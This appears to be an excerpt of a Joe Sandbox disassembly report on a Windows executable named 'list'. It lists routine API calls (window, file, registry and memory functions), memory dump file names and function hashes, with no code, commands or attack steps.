                                                                                                                                        Similarity
                                                                                                                                        • API ID: FormatMessage
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1306739567-0
                                                                                                                                        • Opcode ID: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                                                                        • Instruction ID: fbc307da5c1359fbfbc351051067b699ae1438aedf6613c80dda169529e76e7e
                                                                                                                                        • Opcode Fuzzy Hash: 07eb917982e44065cc90d67cadef310e262c4caec6bcfbb1197f6d5f5d2cfc19
                                                                                                                                        • Instruction Fuzzy Hash: BCE0206278431116F2353416AC47B77150E43C0708F944027BB90DF3D3D6AF9945D25E
                                                                                                                                        APIs
                                                                                                                                        • GetTextExtentPointA.GDI32(?,00000000,00000000), ref: 0041AF9B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExtentPointText
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 566491939-0
                                                                                                                                        • Opcode ID: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                                                                        • Instruction ID: 6b43be1268843882f9474f888990ee0a0f71ddbfb678ee1088bae751a0726d8f
                                                                                                                                        • Opcode Fuzzy Hash: fe3873e992a20e622ffaf78f93863b288a9be0a8311253c2d6346deae250c6a6
                                                                                                                                        • Instruction Fuzzy Hash: E3E086F13097102BD600E67E1DC19DB77DC8A483697148177F458E7392D62DDE1A43AE
                                                                                                                                        APIs
                                                                                                                                        • CreateWindowExA.USER32(00000000,0042367C,00000000,94CA0000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00406311
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 716092398-0
                                                                                                                                        • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                                                        • Instruction ID: 53e57476791a39574122dfc8a3f58f2f78c4a621b5a82e38d1c80b15216a1e52
                                                                                                                                        • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                                                                                        • Instruction Fuzzy Hash: EEE0FEB2214209BBDB00DE8ADCC1DABB7ACFB4C654F808105BB1C972428275AC608B71
                                                                                                                                        APIs
                                                                                                                                        • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DE10
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Create
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2289755597-0
                                                                                                                                        • Opcode ID: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                                                                        • Instruction ID: 68673b5cf84413dff1d7ecec16939cb2303f89f305828e6cd22260af4b89741b
                                                                                                                                        • Opcode Fuzzy Hash: 296f4a6b1841180fcb6525c1425398a2afe0618770c3240f8adf4a5c8222c494
                                                                                                                                        • Instruction Fuzzy Hash: EDE07EB2610119AF9B40DE8CDC81EEB37ADAB1D350F404016FA08E7200C2B4EC519BB4
                                                                                                                                        APIs
                                                                                                                                        • FindClose.KERNEL32(00000000,000000FF,0047096C,00000000,00471782,?,00000000,004717CB,?,00000000,00471904,?,00000000,?,00000000), ref: 00454C0E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseFind
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1863332320-0
                                                                                                                                        • Opcode ID: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                                                                        • Instruction ID: 5c2dbd3a099336849a47a332199978da45cb785deb8a29a76394180ab3bc5383
                                                                                                                                        • Opcode Fuzzy Hash: 6665614e34a0f7cff573ca1669b2a109aa27f3c0ddffd1931b228eca5c2d9aab
                                                                                                                                        • Instruction Fuzzy Hash: A1E09BB09097004BC715DF39858031A76D19FC9325F05C96AEC99CF3D7E77D84454617
                                                                                                                                        APIs
                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(004959E6,?,00495A08,?,?,00000000,004959E6,?,?), ref: 0041469B
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2492992576-0
                                                                                                                                        • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                                                        • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                                                                                        • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                                                                                        • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                                                                                        APIs
                                                                                                                                        • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F24
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileWrite
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3934441357-0
                                                                                                                                        • Opcode ID: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                                                                        • Instruction ID: adeaf4ebd0e6cd94d64be6b3cb299443ba394f13a0b1cd3d8337db6b6af80796
                                                                                                                                        • Opcode Fuzzy Hash: 4c02731fe18b0a47ab7745946c5e8dd4c7dfafdb2aa22804bebcbb41d9412fbb
                                                                                                                                        • Instruction Fuzzy Hash: 53D012722091506AD220965A6C44EAB6BDCCBC5770F11063AB558C2181D7209C01C675
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 004235F8: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042360D
                                                                                                                                        • ShowWindow.USER32(00410460,00000009,?,00000000,0041EDA4,0042393A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C0C), ref: 00423667
                                                                                                                                          • Part of subcall function 00423628: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423644
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoParametersSystem$ShowWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3202724764-0
                                                                                                                                        • Opcode ID: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                                                                        • Instruction ID: 3e39ddd90fb628193caaea160b6f4ed5bf244f394cc2da11a07db6b12dca8b82
                                                                                                                                        • Opcode Fuzzy Hash: 749b279e1c5e0ab7b3e77853442b745bf30ea7cb0c28c018a636783dda1148f2
                                                                                                                                        • Instruction Fuzzy Hash: 34D05E123821703142307ABB280699B46EC8D822EB389043BB5449B312ED5DCE01116C
                                                                                                                                        APIs
                                                                                                                                        • SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: TextWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 530164218-0
                                                                                                                                        • Opcode ID: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                                                                        • Instruction ID: e359d8c046b4275bb87a72ac3440150ee0889cd0e7de0465f76ccf46c1161c2e
                                                                                                                                        • Opcode Fuzzy Hash: 968e2600307bd84f4d65718215a4df57ccfa9b7919b98356d7a542cd4e907fd2
                                                                                                                                        • Instruction Fuzzy Hash: 81D05EE27011602BCB01BAED54C4AC667CC9B8D25AB1840BBF904EF257D638CE40C398
                                                                                                                                        APIs
                                                                                                                                        • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00467828,00000000,00000000,00000000,0000000C,00000000), ref: 00466B58
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CallbackDispatcherUser
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2492992576-0
                                                                                                                                        • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                                                        • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                                                                                        • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                                                                                        • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,00000000,004515CB,00000000), ref: 0042CD2F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AttributesFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                        • Opcode ID: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                                                                        • Instruction ID: 53db4a1afaa3b7bebcc80daf879f764776582c58df104e6651e2d127eece83ed
                                                                                                                                        • Opcode Fuzzy Hash: 699a035a793c66476b33cfcb292e18e8433149420fa0246697406cd7a61acf8b
                                                                                                                                        • Instruction Fuzzy Hash: 48C08CE03222001A9E60A6BD2CC551F06CC891423A3A41E3BB129EB2E2D23D88162818
                                                                                                                                        APIs
                                                                                                                                        • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A6D4,0040CC80,?,00000000,?), ref: 00406EDD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CreateFile
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 823142352-0
                                                                                                                                        • Opcode ID: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                                                                        • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                                                                                        • Opcode Fuzzy Hash: d487f09bce5ab2446fefe52ff91139140134d323c8d44495a9ab4cbc0f9c4527
                                                                                                                                        • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                                                                                        APIs
                                                                                                                                        • SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                                                          • Part of subcall function 004506B4: GetLastError.KERNEL32(004504D0,00450776,?,00000000,?,00497E2C,00000001,00000000,00000002,00000000,00497F8D,?,?,00000005,00000000,00497FC1), ref: 004506B7
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorFileLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 734332943-0
                                                                                                                                        • Opcode ID: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                                                                        • Instruction ID: 9573b676cf6dd5fef234c73c81a1a5d02d78d5ca05287b50762f3c98dcfac2da
                                                                                                                                        • Opcode Fuzzy Hash: dfd6122944db5b319254e7b77af95d7469dcf5406d44b15aeae4525e96e42585
                                                                                                                                        • Instruction Fuzzy Hash: 1AC04CA5700211479F10A6BA85C1A0662D86A5D3157144066BD08CF207D668D8148A18
                                                                                                                                        APIs
                                                                                                                                        • SetCurrentDirectoryA.KERNEL32(00000000,?,00497DBA,00000000,00497F8D,?,?,00000005,00000000,00497FC1,?,?,00000000), ref: 004072B3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentDirectory
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1611563598-0
                                                                                                                                        • Opcode ID: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                                                                        • Instruction ID: 2ee9fcf0c2ecb8048618371478a38130c752a95b947e2a8aefd026f579ab26ad
                                                                                                                                        • Opcode Fuzzy Hash: 9cfe1b671e2ded52e2a4f1899edd371c25323ab6eac1b77aed394817f5a1d109
                                                                                                                                        • Instruction Fuzzy Hash: 33B012E03D120A2BCA0079FE4CC192A00CC46292163401B3B3006EB1C3D83DC8180824
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNEL32(?,0042E40D), ref: 0042E400
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorMode
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2340568224-0
                                                                                                                                        • Opcode ID: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                                                                        • Instruction ID: 426ac138898b17598b25982f2c454791bd479401c65f9a69ae9baa170422678e
                                                                                                                                        • Opcode Fuzzy Hash: cb8e2ebd86b0ac1182f6c4657d989dfa6a466ad308997f4b3834ff3b1e7758f7
                                                                                                                                        • Instruction Fuzzy Hash: CDB09B7670C6105EE709D6D5B45552D63D4D7C57207E14477F010D2581D57D58054E18
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DestroyWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3375834691-0
                                                                                                                                        • Opcode ID: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                                                                        • Instruction ID: 4f6e5339ba6c71e81ef5aec1f6829bfe42d3c8de95bc03762545e97b2cddf6f9
                                                                                                                                        • Opcode Fuzzy Hash: 1244af60e57b01067fe56da529b9c4312cbd500fa9ed17bad69dff1823a021af
                                                                                                                                        • Instruction Fuzzy Hash: 1AA00275501500AADA00E7B5D849F7E2298BB44204FD905F9714897056C57C99008B55
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                                                                        • Instruction ID: 41a6872630840156d23f43a697f0b10540748f54e9aa1b8241e7bbe25a2b1888
                                                                                                                                        • Opcode Fuzzy Hash: 2f87504b9b3c5ef8a424e08888e9b878f09f15df180bfdf00abd21092ab1bc52
                                                                                                                                        • Instruction Fuzzy Hash: 73517574E002099FDB00EFA9C892AAFBBF5EB49314F50817AE500E7351DB389D41CB98
                                                                                                                                        APIs
                                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDA4,?,0042388F,00423C0C,0041EDA4), ref: 0041F3E2
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocVirtual
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4275171209-0
                                                                                                                                        • Opcode ID: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                                                                        • Instruction ID: 3312bc658de40493dbbbdb628fa1ac862c14c743cb2aabe02eeb7d71ec829e14
                                                                                                                                        • Opcode Fuzzy Hash: f624f178b2757757f6ee0ed82108e7e17b49aa81eb1cfd09d0e3ddd3732ee692
                                                                                                                                        • Instruction Fuzzy Hash: D5115A752007059BCB20DF19D880B82FBE5EF98390F10C53BE9688B385D3B4E8458BA9
                                                                                                                                        APIs
